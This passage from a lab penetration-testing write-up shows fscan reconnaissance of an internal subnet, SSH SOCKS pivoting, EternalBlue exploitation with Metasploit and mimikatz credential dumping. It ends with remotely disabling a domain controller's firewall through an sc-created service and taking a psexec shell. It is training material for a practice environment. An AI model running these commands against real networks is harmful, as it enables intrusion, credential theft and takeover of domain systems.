inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
inet6 fe80::42:29ff:fefc:b3bf/64 scope link
valid_lft forever preferred_lft forever
6: br-f0d07941b332: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 02:42:08:d3:ed:3c brd ff:ff:ff:ff:ff:ff
inet 172.19.0.1/16 brd 172.19.255.255 scope global br-f0d07941b332
valid_lft forever preferred_lft forever
7: br-05384b1b0df2: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 02:42:77:1a:64:7a brd ff:ff:ff:ff:ff:ff
inet 172.18.0.1/16 brd 172.18.255.255 scope global br-05384b1b0df2
valid_lft forever preferred_lft forever
9: vetha18b54f@if8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default
link/ether ba:51:d0:c7:b2:be brd ff:ff:ff:ff:ff:ff
inet6 fe80::b851:d0ff:fec7:b2be/64 scope link
valid_lft forever preferred_lft forever
7. Fscan
Same trick as before: upload fscan and scan the domain network directly.
Before that, check the routing table and firewall state:
root@ubuntu:~# ip route show
default via 192.168.52.2 dev eth0
169.254.0.0/16 dev eth1 scope link metric 1000
172.17.0.0/16 dev docker0 proto kernel scope link src 172.17.0.1
172.18.0.0/16 dev br-05384b1b0df2 proto kernel scope link src 172.18.0.1
172.19.0.0/16 dev br-f0d07941b332 proto kernel scope link src 172.19.0.1
172.20.0.0/16 dev br-1d665e13ee58 proto kernel scope link src 172.20.0.1
192.168.52.0/24 dev eth0 proto kernel scope link src 192.168.52.20
192.168.93.0/24 dev eth1 proto kernel scope link src 192.168.93.10
Directly connected to the domain network.
bash
root@ubuntu:~# iptables -L -v -n 2>/dev/null
Chain INPUT (policy ACCEPT 2829 packets, 279K bytes)
pkts bytes target prot opt in out source destination
Chain FORWARD (policy DROP 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
6009 13M DOCKER-USER all -- * * 0.0.0.0/0 0.0.0.0/0
6009 13M DOCKER-ISOLATION-STAGE-1 all -- * * 0.0.0.0/0 0.0.0.0/0
2591 7215K ACCEPT all -- * docker0 0.0.0.0/0 0.0.0.0/0 ctstate RELATED,ESTABLISHED
179 10740 DOCKER all -- * docker0 0.0.0.0/0 0.0.0.0/0
3239 6271K ACCEPT all -- docker0 !docker0 0.0.0.0/0 0.0.0.0/0
0 0 ACCEPT all -- docker0 docker0 0.0.0.0/0 0.0.0.0/0
0 0 ACCEPT all -- * br-05384b1b0df2 0.0.0.0/0 0.0.0.0/0 ctstate RELATED,ESTABLISHED
0 0 DOCKER all -- * br-05384b1b0df2 0.0.0.0/0 0.0.0.0/0
0 0 ACCEPT all -- br-05384b1b0df2 !br-05384b1b0df2 0.0.0.0/0 0.0.0.0/0
0 0 ACCEPT all -- br-05384b1b0df2 br-05384b1b0df2 0.0.0.0/0 0.0.0.0/0
0 0 ACCEPT all -- * br-f0d07941b332 0.0.0.0/0 0.0.0.0/0 ctstate RELATED,ESTABLISHED
0 0 DOCKER all -- * br-f0d07941b332 0.0.0.0/0 0.0.0.0/0
0 0 ACCEPT all -- br-f0d07941b332 !br-f0d07941b332 0.0.0.0/0 0.0.0.0/0
0 0 ACCEPT all -- br-f0d07941b332 br-f0d07941b332 0.0.0.0/0 0.0.0.0/0
0 0 ACCEPT all -- * br-1d665e13ee58 0.0.0.0/0 0.0.0.0/0 ctstate RELATED,ESTABLISHED
0 0 DOCKER all -- * br-1d665e13ee58 0.0.0.0/0 0.0.0.0/0
0 0 ACCEPT all -- br-1d665e13ee58 !br-1d665e13ee58 0.0.0.0/0 0.0.0.0/0
0 0 ACCEPT all -- br-1d665e13ee58 br-1d665e13ee58 0.0.0.0/0 0.0.0.0/0
Chain OUTPUT (policy ACCEPT 2050 packets, 181K bytes)
pkts bytes target prot opt in out source destination
Chain DOCKER (4 references)
pkts bytes target prot opt in out source destination
179 10740 ACCEPT tcp -- !docker0 docker0 0.0.0.0/0 172.17.0.2 tcp dpt:80
Chain DOCKER-ISOLATION-STAGE-1 (1 references)
pkts bytes target prot opt in out source destination
3239 6271K DOCKER-ISOLATION-STAGE-2 all -- docker0 !docker0 0.0.0.0/0 0.0.0.0/0
0 0 DOCKER-ISOLATION-STAGE-2 all -- br-05384b1b0df2 !br-05384b1b0df2 0.0.0.0/0 0.0.0.0/0
0 0 DOCKER-ISOLATION-STAGE-2 all -- br-f0d07941b332 !br-f0d07941b332 0.0.0.0/0 0.0.0.0/0
0 0 DOCKER-ISOLATION-STAGE-2 all -- br-1d665e13ee58 !br-1d665e13ee58 0.0.0.0/0 0.0.0.0/0
6009 13M RETURN all -- * * 0.0.0.0/0 0.0.0.0/0
Chain DOCKER-ISOLATION-STAGE-2 (4 references)
pkts bytes target prot opt in out source destination
0 0 DROP all -- * docker0 0.0.0.0/0 0.0.0.0/0
0 0 DROP all -- * br-05384b1b0df2 0.0.0.0/0 0.0.0.0/0
0 0 DROP all -- * br-f0d07941b332 0.0.0.0/0 0.0.0.0/0
0 0 DROP all -- * br-1d665e13ee58 0.0.0.0/0 0.0.0.0/0
3239 6271K RETURN all -- * * 0.0.0.0/0 0.0.0.0/0
Chain DOCKER-USER (1 references)
pkts bytes target prot opt in out source destination
6009 13M RETURN all -- * * 0.0.0.0/0 0.0.0.0/0
root@ubuntu:~# ufw status 2>/dev/null
Status: inactive
root@ubuntu:~# nft list ruleset 2>/dev/null
root@ubuntu:~#
Reading the rules: INPUT and OUTPUT have policy ACCEPT with no rules of their own, everything in FORWARD is Docker's bridge plumbing, ufw is inactive and there is no nftables ruleset. The host itself restricts neither inbound nor outbound traffic, so upload fscan:
bash
proxychains scp -o PubkeyAcceptedAlgorithms=+ssh-rsa -o HostkeyAlgorithms=+ssh-rsa -i target /usr/local/bin/fscan root@192.168.52.20:/tmp/
Make it executable and run it:
root@ubuntu:/tmp# ./fscan -h 192.168.93.0/24
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
(icmp) Target 192.168.93.10 is alive
(icmp) Target 192.168.93.20 is alive
(icmp) Target 192.168.93.30 is alive
(icmp) Target 192.168.93.40 is alive
[*] Icmp alive hosts len is: 4
192.168.93.10:8000 open
192.168.93.30:88 open
192.168.93.20:8080 open
192.168.93.20:1081 open
192.168.93.20:1080 open
192.168.93.40:445 open
192.168.93.30:445 open
192.168.93.20:445 open
192.168.93.40:139 open
192.168.93.30:139 open
192.168.93.20:139 open
192.168.93.40:135 open
192.168.93.30:135 open
192.168.93.20:135 open
192.168.93.10:22 open
[*] alive ports len is: 15
start vulscan
[*] NetInfo
[*]192.168.93.30
[->]DC
[->]192.168.93.30
[+] MS17-010 192.168.93.30 (Windows Server 2012 R2 Datacenter 9600)
[+] MS17-010 192.168.93.40 (Windows 7 Professional 7601 Service Pack 1)
[*] NetBios 192.168.93.30 [+] DC:DC.whoamianony.org Windows Server 2012 R2 Datacenter 9600
[+] MS17-010 192.168.93.20 (Windows 7 Professional 7601 Service Pack 1)
[*] NetBios 192.168.93.40 PC2.whoamianony.org Windows 7 Professional 7601 Service Pack 1
[*] WebTitle http://192.168.93.20:8080 code:200 len:10065 title:通达OA网络智能办公系统
[+] InfoScan http://192.168.93.20:8080 [通达OA]
[*] WebTitle http://192.168.93.10:8000 code:200 len:17474 title:Laravel
[+] InfoScan http://192.168.93.10:8000 [Laravel]
[+] PocScan http://192.168.93.20:8080 tongda-user-session-disclosure
[+] PocScan http://192.168.93.10:8000 poc-yaml-laravel-cve-2021-3129
已完成 14/15 [-] ssh 192.168.93.10:22 root pass@123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 14/15 [-] ssh 192.168.93.10:22 root 1 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 14/15 [-] ssh 192.168.93.10:22 root root111 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 14/15 [-] ssh 192.168.93.10:22 root root@2019 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 14/15 [-] ssh 192.168.93.10:22 root 12345678 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 14/15 [-] ssh 192.168.93.10:22 root 123456789 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 15/15
[*] 扫描结束,耗时: 7m15.055664472s
Much of this we had already worked out, but two results are very valuable:
both remaining domain hosts, the DC at 192.168.93.30 and PC2 at 192.168.93.40, are vulnerable to MS17-010 (EternalBlue). The hit on 192.168.93.20 is PC1, which we already own.
VIII. EternalBlue again
Test 192.168.93.30 (the domain controller) first, exploiting it the same way as before (the procedure was covered earlier, so this part is brief).
Set up a SOCKS proxy through the Ubuntu host:
proxychains ssh -o PubkeyAcceptedAlgorithms=+ssh-rsa -o HostkeyAlgorithms=+ssh-rsa -i target -D 1090 -N -C root@192.168.52.20
Note the different local port, so it does not clash with the first tunnel.
Point MSF's global proxy at it:
setg Proxies socks5h://127.0.0.1:1090
Now MSF can reach the domain network directly.
But repeated attempts against the DC failed. Switching to 192.168.93.40 gave a meterpreter straight away:
meterpreter > sysinfo
Computer : PC2
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : zh_CN
Domain : WHOAMIANONY
Logged On Users : 1
Meterpreter : x64/windows
Add a route into the domain network:
run autoroute -s 192.168.93.0/24
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 192.168.93.0/255.255.255.0...
[+] Added route to 192.168.93.0/255.255.255.0 via 192.168.93.40
[*] Use the -p option to list all active routes
Credential gathering again yields only the machine account:
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username Domain NTLM SHA1
-------- ------ ---- ----
PC2$ WHOAMIANONY 9d1bd19fad217f76570f6965f2d3cd63 06c32efff7257e555904cceac5b007ca7b685ec5
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
PC2$ WHOAMIANONY 02 be bd 88 d1 38 04 51 97 8a e6 18 67 05 5b 56 7e 37 be 79 af 00 87 ff 24 fa 72 47 3c 30 aa a0 7e ee b4 f6 3b 7e 06 00
26 b9 2e ad a4 fe 3c 6f 98 7c ce 58 2f 3f e6 89 70 7e 4c 46 d6 ff 09 a2 40 e1 f9 53 ad 49 9e 6c 0e c0 26 73 29 b4 52 7
5 a3 f1 5c 3e d3 a5 5a 8b 71 b0 6c 5e 60 a7 33 27 49 09 f4 f0 a7 01 7f f5 8b bd e8 e6 43 f4 cd b1 0a 8e 81 16 89 95 20
89 b1 82 bd 85 28 cc 0e 63 47 48 6d 9b a3 d2 08 41 cd d8 8c 99 61 dd e5 f2 cd c1 32 a0 91 4a 52 67 d5 da 44 c5 c2 02 de
76 fc 61 48 14 12 81 ad 97 b0 02 a8 6f 46 06 ab 26 02 20 4c 9f 56 51 d8 a4 aa 2c df 94 7b a4 b3 dd 08 a3 db dc 48 da 6
2 25 83 fd 71 fd 50 bc 94 e9 c5 d8 9f 2d 04 8c 6b ab 00 dc 1c 10 b9 b7 dc 62 c5 cd 28 14 fe d9 a5 28 f5 ee 51 1f 11 7c
fe e2
kerberos credentials
====================
Username Domain Password
-------- ------ --------
(null) (null) (null)
pc2$ WHOAMIANONY.ORG 02 be bd 88 d1 38 04 51 97 8a e6 18 67 05 5b 56 7e 37 be 79 af 00 87 ff 24 fa 72 47 3c 30 aa a0 7e ee b4 f6 3b 7e 0
6 00 26 b9 2e ad a4 fe 3c 6f 98 7c ce 58 2f 3f e6 89 70 7e 4c 46 d6 ff 09 a2 40 e1 f9 53 ad 49 9e 6c 0e c0 26 73 29
b4 52 75 a3 f1 5c 3e d3 a5 5a 8b 71 b0 6c 5e 60 a7 33 27 49 09 f4 f0 a7 01 7f f5 8b bd e8 e6 43 f4 cd b1 0a 8e 81
16 89 95 20 89 b1 82 bd 85 28 cc 0e 63 47 48 6d 9b a3 d2 08 41 cd d8 8c 99 61 dd e5 f2 cd c1 32 a0 91 4a 52 67 d5 d
a 44 c5 c2 02 de 76 fc 61 48 14 12 81 ad 97 b0 02 a8 6f 46 06 ab 26 02 20 4c 9f 56 51 d8 a4 aa 2c df 94 7b a4 b3 dd
08 a3 db dc 48 da 62 25 83 fd 71 fd 50 bc 94 e9 c5 d8 9f 2d 04 8c 6b ab 00 dc 1c 10 b9 b7 dc 62 c5 cd 28 14 fe d9
a5 28 f5 ee 51 1f 11 7c fe e2
It looks odd, but the hex blob is simply PC2's machine-account password, a long random string that mimikatz prints as raw bytes because it is not printable; still nothing beyond the computer account.
meterpreter > kiwi_cmd "lsadump::cache"
Domain : PC2
SysKey : fd4639f4e27c79683ae9fee56b44393f
Local name : PC2 ( S-1-5-21-1982601180-2087634876-2293013296 )
Domain name : WHOAMIANONY ( S-1-5-21-1315137663-3706837544-1429009142 )
Domain FQDN : whoamianony.org
Policy subsystem is : 1.11
LSA Key(s) : 1, default {c4f0262f-f9ba-5833-89e5-1264beb97c37}
[00] {c4f0262f-f9ba-5833-89e5-1264beb97c37} 12ec51d5510d2e28b5f273a98a547e21ceec081867af5348f219b08215f27558
* Iteration is set to default (10240)
[NL$1 - 2021/2/22 18:55:30]
RID : 00000458 (1112)
User : WHOAMIANONY\bunny
MsCacheV2 : 00dd17d44798d1ac5f335365db696d1e
[NL$2 - 2021/2/22 17:40:39]
RID : 000001f4 (500)
User : WHOAMIANONY\Administrator
MsCacheV2 : 2f44261182b156fe4e2cb03b39925b72
[NL$4 - 2025/9/18 9:06:20]
RID : 0000045b (1115)
User : WHOAMIANONY\moretz
MsCacheV2 : d6d791a922b0578b81c0a93a3c9a5382
Once again only MsCacheV2 hashes.
IX. Checking the walkthrough
The official walkthrough:
https://www.freebuf.com/articles/network/264560.html
It obtained the domain admin's cleartext password (Whoami2021) simply by dumping credentials on 192.168.52.30......
So this is presumably a problem with the lab environment (reported to 棉花糖).
Then again, that is exactly where the fun of labs lies.
X. Logging in to the DC and grabbing the flag
So, "pretending" we found the domain admin's cleartext password, try logging in directly:
proxychains impacket-psexec \
WHOAMIANONY/administrator:Whoami2021@192.168.93.30
It fails, probably because of a firewall. With an existing session plus the password we can turn off the DC's firewall remotely. The service exists only as a vehicle for the command: sc start will report an error because netsh is not a real service binary, but the command still runs:
meterpreter > shell
net use \\192.168.93.30\ipc$ "Whoami2021" /user:"WHOAMIANONY\administrator"
sc \\192.168.93.30 create disablefw binpath= "netsh advfirewall set allprofiles state off"
sc \\192.168.93.30 start disablefw
exit
Then try again:
proxychains impacket-psexec \
WHOAMIANONY/administrator:Whoami2021@192.168.93.30
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[proxychains] Strict chain ... 127.0.0.1:1090 ... 192.168.93.30:445 ... OK
[*] Requesting shares on 192.168.93.30.....
[*] Found writable share ADMIN$
[*] Uploading file XDDSTHvz.exe
[*] Opening SVCManager on 192.168.93.30.....
[*] Creating service fqAv on 192.168.93.30.....
[*] Starting service fqAv.....
[proxychains] Strict chain ... 127.0.0.1:1090 ... 192.168.93.30:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1090 ... 192.168.93.30:445 ... OK
[!] Press help for extra shell commands
[proxychains] Strict chain ... 127.0.0.1:1090 ... 192.168.93.30:445 ... OK
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
Microsoft Windows [�汾 6.3.9600]
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
(c) 2013 Microsoft Corporation����������Ȩ����
C:\Windows\system32>
Success. What remains is finding and reading the flag, which I will not go into. The garbled lines are just the DC's GBK console output being decoded as UTF-8; passing -codec gbk to psexec, or running chcp 65001 in the shell as was done on PC1 earlier, fixes the display.